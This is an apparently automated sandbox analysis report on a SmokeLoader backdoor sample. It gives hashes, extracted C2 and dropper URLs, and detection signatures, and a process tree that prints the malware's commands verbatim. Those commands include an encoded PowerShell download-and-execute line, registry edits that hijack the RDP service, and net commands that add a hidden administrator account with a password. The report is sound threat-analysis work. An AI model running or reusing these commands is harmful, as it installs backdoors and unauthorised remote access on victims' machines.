Overview

overview

10

Static

static

2b858c79a8...5a.exe

windows7_x64

10

2b858c79a8...5a.exe

windows10_x64

10

Analysis

  • max time kernel
    152s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    18-10-2021 13:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2b858c79a8a7a652f8cb60059eb7a95a.exe

  • Size

    343KB

  • MD5

    2b858c79a8a7a652f8cb60059eb7a95a

  • SHA1

    e669008a553976d275388ee02e49d5c938a6c27b

  • SHA256

    991e3c5fb9946ed0490a723a541bda0f36a9b94fff8a68f6729c15e1044dd954

  • SHA512

    c893d061191282d82bb421ef587b5c0dd973a31aec371d1bba6aba83a5a48444bc1660b9aa80d0f8f1f3beceb86825de2b249a0ffb64c905588f11c4a0bae8c9

Score
10/10
smokeloaderbackdoorpersistencesuricatatrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/
rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2b858c79a8a7a652f8cb60059eb7a95a.exe
    "C:\Users\Admin\AppData\Local\Temp\2b858c79a8a7a652f8cb60059eb7a95a.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:2424
  • C:\Users\Admin\AppData\Local\Temp\8D29.exe
    C:\Users\Admin\AppData\Local\Temp\8D29.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4060
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vey4tttg\vey4tttg.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3972
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABBD.tmp" "c:\Users\Admin\AppData\Local\Temp\vey4tttg\CSC4E7922EF827F41AF9021BEF8D71C1C74.TMP"
          4⤵
            PID:828
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1404
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3152
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:908
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3376
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:2212
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:3292
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3212
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2588
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3896
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3836
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1328
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2652
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2184
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1548
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3628
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:3584
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:748
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:1368
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2696
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:716
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:2468
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc 7R4k4ROY /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1820
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc 7R4k4ROY /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1412
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc 7R4k4ROY /add
                          3⤵
                            PID:1272
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1404
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3264
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:1092
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3888
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1900
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                              3⤵
                                PID:2072
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2868
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3904
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:1452
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc 7R4k4ROY
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2976
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc 7R4k4ROY
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1464
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc 7R4k4ROY
                                  3⤵
                                    PID:2100
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                  PID:3404
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic path win32_VideoController get name
                                    2⤵
                                    • Modifies data under HKEY_USERS
                                    PID:3624
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                    PID:1544
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic CPU get NAME
                                      2⤵
                                      • Modifies data under HKEY_USERS
                                      PID:3484
                                  • C:\Windows\System32\cmd.exe
                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                    1⤵
                                      PID:644
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                        2⤵
                                          PID:3644
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                            3⤵
                                            • Blocklisted process makes network request
                                            • Drops file in Program Files directory
                                            • Drops file in Windows directory
                                            • Modifies data under HKEY_USERS
                                            PID:3252

                                      Network

                                      MITRE ATT&CK Enterprise v6

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • memory/908-284-0x0000020EC7F90000-0x0000020EC7F92000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/908-285-0x0000020EC7F93000-0x0000020EC7F95000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/908-286-0x0000020EC7F96000-0x0000020EC7F98000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/908-295-0x0000020EC7F98000-0x0000020EC7F9A000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-210-0x00000200AC2F8000-0x00000200AC2FA000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-174-0x00000200921A0000-0x00000200921A2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-168-0x00000200921A0000-0x00000200921A2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-200-0x00000200AC2F6000-0x00000200AC2F8000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-178-0x00000200921A0000-0x00000200921A2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-176-0x00000200AC2F3000-0x00000200AC2F5000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-175-0x00000200AC2F0000-0x00000200AC2F2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-173-0x00000200921A0000-0x00000200921A2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-171-0x00000200921A0000-0x00000200921A2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-170-0x00000200921A0000-0x00000200921A2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/1404-169-0x00000200921A0000-0x00000200921A2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/2424-117-0x0000000000400000-0x0000000000788000-memory.dmp

                                        Filesize

                                        3.5MB

                                        Download

                                      • memory/2424-116-0x00000000007E0000-0x00000000007E9000-memory.dmp

                                        Filesize

                                        36KB

                                        Download

                                      • memory/3024-118-0x0000000000D10000-0x0000000000D26000-memory.dmp

                                        Filesize

                                        88KB

                                        Download

                                      • memory/3152-241-0x00000251B9B40000-0x00000251B9B42000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3152-243-0x00000251B9B46000-0x00000251B9B48000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3152-242-0x00000251B9B43000-0x00000251B9B45000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3152-283-0x00000251B9B48000-0x00000251B9B4A000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3252-402-0x0000026D20F68000-0x0000026D20F69000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3252-388-0x0000026D20F66000-0x0000026D20F68000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3252-383-0x0000026D20F63000-0x0000026D20F65000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3252-382-0x0000026D20F60000-0x0000026D20F62000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3960-126-0x00000205E8AB5000-0x00000205E8AB6000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3960-125-0x00000205E8AB3000-0x00000205E8AB5000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3960-124-0x00000205E8AB0000-0x00000205E8AB2000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/3960-127-0x00000205E8AB6000-0x00000205E8AB7000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3960-122-0x00000205E8ED0000-0x00000205E92CF000-memory.dmp

                                        Filesize

                                        4.0MB

                                        Download

                                      • memory/4060-132-0x0000018DB7410000-0x0000018DB7412000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-129-0x0000018DB7410000-0x0000018DB7412000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-131-0x0000018DB7410000-0x0000018DB7412000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-144-0x0000018DD1206000-0x0000018DD1208000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-156-0x0000018DD1208000-0x0000018DD1209000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4060-133-0x0000018DD1310000-0x0000018DD1311000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4060-152-0x0000018DD1460000-0x0000018DD1461000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4060-130-0x0000018DB7410000-0x0000018DB7412000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-159-0x0000018DD1A70000-0x0000018DD1A71000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4060-134-0x0000018DD1200000-0x0000018DD1202000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-135-0x0000018DD1203000-0x0000018DD1205000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-136-0x0000018DB7410000-0x0000018DB7412000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-137-0x0000018DB7410000-0x0000018DB7412000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-138-0x0000018DD14C0000-0x0000018DD14C1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4060-140-0x0000018DB7410000-0x0000018DB7412000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4060-160-0x0000018DD1E00000-0x0000018DD1E01000-memory.dmp

                                        Filesize

                                        4KB

                                        Download